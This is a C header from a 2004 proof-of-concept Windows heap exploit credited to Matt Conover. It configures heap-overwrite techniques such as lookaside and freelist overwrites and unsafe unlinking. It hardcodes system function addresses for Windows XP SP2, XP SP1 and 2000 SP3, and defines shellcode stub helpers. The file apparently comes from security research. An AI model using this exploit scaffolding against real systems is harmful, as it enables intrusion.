// Proof-of-concept code heap exploit code
// Written by Matt Conover in December 2004
#ifndef SHELLCODE_H
#define SHELLCODE_H

#define USE_XPSP2

//#define USE_FREELIST_LISTHEAD_OVERWRITE 1
//#define USE_LOOKASIDE_LISTHEAD_OVERWRITE 1
//#define USE_UNSAFE_UNLINKING_FREELIST_OVERWRITE
#define USE_CHUNK_ON_LOOKASIDE_OVERWRITE 1
//#define USE_LOOKASIDE_REMAP 1
//#define USE_CACHE_OVERWRITE 1

//#define USE_C_SHELLCODE 1
//#define USE_THREAD_TERMINATE 1 // if this is not defined, the shellcode goes into a loop instead
#define USE_PROCESS_TERMINATE 1

#define GET_CURRENT_PROCESS() ((HANDLE)0xFFFFFFFF)
#define GET_CURRENT_THREAD() ((HANDLE)0xFFFFFFFE)

/////////////////////////////////////////////////////////////////
// Depends on version of NTDLL and KERNEL32

// Windows XP SP2
#define RTL_ENTER_CRITICAL_SECTION 0x7C901005
#define RTL_LEAVE_CRITICAL_SECTION 0x7C9010ED
#define ZW_TERMINATE_THREAD 0x7C90E8A3
#define ZW_TERMINATE_PROCESS 0x7C90E88E
#define SLEEP 0x7C802442
//#define SEH 0x7C8833AC // NOTE on XPSP2: this must be overwritten with a pointer returned from RtlEncodePointer()

// Windows XP SP1
//#define RTL_ENTER_CRITICAL_SECTION 0x77f5b2a0 
//#define RTL_LEAVE_CRITICAL_SECTION 0x77f5b380
//#define ZW_TERMINATE_THREAD 0x77f5c458
//#define ZW_TERMINATE_PROCESS 0x77f5c448
//#define SLEEP 0x77e61bea
//#define SEH 0x77ee044c

// Windows 2000 SP3
//#define RTL_ENTER_CRITICAL_SECTION 0x77f8313c
//#define RTL_LEAVE_CRITICAL_SECTION 0x77f8316d
//#define ZW_TERMINATE_THREAD 0x77f852cd
//#define ZW_TERMINATE_PROCESS 0x77f896c3
//#define SLEEP 0x77ea9d54
//#define SEH 0x77ea1678

#define X86_JMP_4BYTES 0xe9
#define MAX_STUB_SIZE 1024
#define END_SIGNATURE_PART1 0xab
#define END_SIGNATURE_PART2 0xcd
#define END_SIGNATURE_PART3 0xef

#define END_FUNCTION \
	_asm _emit END_SIGNATURE_PART1 \
	_asm _emit END_SIGNATURE_PART2 \
	_asm _emit END_SIGNATURE_PART3

BYTE *GetFunctionAddress(BYTE *Function);
DWORD GetStubLength(BYTE *Stub);
void c_shellcode_stub();
void shellcode_stub();
 
#endif // SHELLCODE_H